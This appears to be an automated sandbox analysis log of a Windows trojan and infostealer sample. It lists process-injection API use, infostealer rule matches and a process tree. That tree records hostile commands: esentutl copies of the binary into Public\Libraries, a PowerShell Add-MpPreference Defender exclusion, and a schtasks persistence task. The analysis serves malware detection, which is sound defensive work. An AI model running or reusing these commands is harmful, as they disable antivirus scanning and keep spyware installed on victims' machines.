                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D87A2C NtAllocateVirtualMemory,27_2_02D87A2C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D87D78 NtWriteVirtualMemory,27_2_02D87D78
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D88D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,27_2_02D88D70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D8DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,27_2_02D8DD70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D886F7 NtUnmapViewOfSection,27_2_02D886F7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D87AC9 NtAllocateVirtualMemory,27_2_02D87AC9
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D87A2A NtAllocateVirtualMemory,27_2_02D87A2A
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D8DBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,27_2_02D8DBB0
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D8DC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,27_2_02D8DC8C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D8DC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,27_2_02D8DC04
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D88D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,27_2_02D88D6E
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDF7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02EDF7C8
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC20C40_2_02EC20C4
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_100400D98_1_100400D9
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_1004515C8_1_1004515C
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_100359808_1_10035980
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10006EAF8_1_10006EAF
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_100439A38_1_100439A3
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_100051EE8_1_100051EE
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10007B718_1_10007B71
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_1003D5808_1_1003D580
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_10007F808_1_10007F80
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_100337808_1_10033780
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_1003C7F08_1_1003C7F0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_02A0EA809_2_02A0EA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_02A04A989_2_02A04A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_02A0AA489_2_02A0AA48
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_02A03E809_2_02A03E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_02A0DE389_2_02A0DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_02A0DE389_2_02A0DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_02A041C89_2_02A041C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_068756B89_2_068756B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_068766E89_2_068766E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_06877E789_2_06877E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_0687C2A09_2_0687C2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_0687B3389_2_0687B338
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_068723609_2_06872360
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_068777989_2_06877798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_0687E4C09_2_0687E4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_06875DF09_2_06875DF0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_068700409_2_06870040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_068700259_2_06870025
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 10_2_013B85B710_2_013B85B7
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 10_2_013B85C810_2_013B85C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_040EB49011_2_040EB490
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_0549DAAC16_2_0549DAAC
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_054925A816_2_054925A8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_054925B816_2_054925B8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_0549E62016_2_0549E620
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_05491D2016_2_05491D20
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_05EA336016_2_05EA3360
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CA20C422_2_02CA20C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D74A9825_2_00D74A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D7EA8025_2_00D7EA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D73E8025_2_00D73E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D7DE3825_2_00D7DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D741C825_2_00D741C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D7DE3825_2_00D7DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D7A98825_2_00D7A988
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B66E825_2_066B66E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B56B825_2_066B56B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066BC2A025_2_066BC2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066BB32B25_2_066BB32B
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B317825_2_066B3178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B7E7825_2_066B7E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B779825_2_066B7798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066BE4C025_2_066BE4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B235025_2_066B2350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B004025_2_066B0040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B5DDF25_2_066B5DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B003825_2_066B0038
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B000625_2_066B0006
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D720C427_2_02D720C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_030A41C829_2_030A41C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_030AAA4329_2_030AAA43
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_030AEA8029_2_030AEA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_030A4A9829_2_030A4A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_030A3E8029_2_030A3E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F066E829_2_06F066E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0C2A029_2_06F0C2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F07E7829_2_06F07E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0B33529_2_06F0B335
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F058B529_2_06F058B5
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0317829_2_06F03178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0779829_2_06F07798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0235029_2_06F02350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0004029_2_06F00040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F05DDF29_2_06F05DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0000629_2_06F00006
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Wisrysxl.PIF F711703C8BA66DCEDB8E4B83F21A0425C528E278242C852FD5CF54BB43E30454
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02D8894C appears 50 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02CA4860 appears 683 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02CA46D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02D746D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02D74860 appears 683 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02CB894C appears 50 times
                      Source: C:\Users\user\Desktop\x.exeCode function: String function: 02ED89D0 appears 45 times
                      Source: C:\Users\user\Desktop\x.exeCode function: String function: 02EC46D4 appears 244 times
                      Source: C:\Users\user\Desktop\x.exeCode function: String function: 02ED894C appears 56 times
                      Source: C:\Users\user\Desktop\x.exeCode function: String function: 02EC44DC appears 74 times
                      Source: C:\Users\user\Desktop\x.exeCode function: String function: 02EC4500 appears 33 times
                      Source: C:\Users\user\Desktop\x.exeCode function: String function: 02EC4860 appears 949 times
                      Source: x.exeBinary or memory string: OriginalFilename vs x.exe
                      Source: x.exe, 00000000.00000002.2243776904.0000000021E70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs x.exe
                      Source: x.exe, 00000000.00000002.2233962338.0000000020C24000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000002.2233962338.0000000020C24000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
                      Source: x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
                      Source: x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs x.exe
                      Source: x.exe, 00000000.00000003.2170510348.0000000021EB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000002.2244527855.000000002206F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
                      Source: x.exe, 00000000.00000003.2180899022.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
                      Source: x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
                      Source: x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
                      Source: x.exe, 00000000.00000002.2200179187.0000000002E46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs x.exe
                      Source: x.exe, 00000000.00000003.2111145235.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000003.2111145235.0000000002C11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
                      Source: x.exe, 00000000.00000002.2200179187.0000000002E4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
                      Source: x.exe, 00000000.00000003.2110299253.000000007FCE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000002.2233962338.0000000020C79000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs x.exe
                      Source: x.exe, 00000000.00000002.2262163417.000000007FC4F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
                      Source: x.exe, 00000000.00000003.2170510348.0000000021EE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
                      Source: x.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: 9.0.neworigin.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: neworigin.exe.8.dr, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                      Source: neworigin.exe.8.dr, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: neworigin.exe.8.dr, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: neworigin.exe.8.dr, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                      Source: neworigin.exe.8.dr, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: neworigin.exe.8.dr, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: neworigin.exe.8.dr, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: neworigin.exe.8.dr, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@47/24@4/3
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EC7FD4 GetDiskFreeSpaceA,0_2_02EC7FD4
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED6DC8 CoCreateInstance,0_2_02ED6DC8
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 8_1_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,8_1_1002CBD0
                      Source: C:\Users\user\Desktop\x.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:828:120:WilError_03
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-659475502e6d002ef280244-b
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-659475502e6d002-inf
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to behavior
                      Source: C:\Users\user\Desktop\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\x.exeFile read: C:\Users\user\Desktop\x.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_8-9141
                      Source: unknownProcess created: C:\Users\user\Desktop\x.exe "C:\Users\user\Desktop\x.exe"
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                      Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "Jump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /oJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
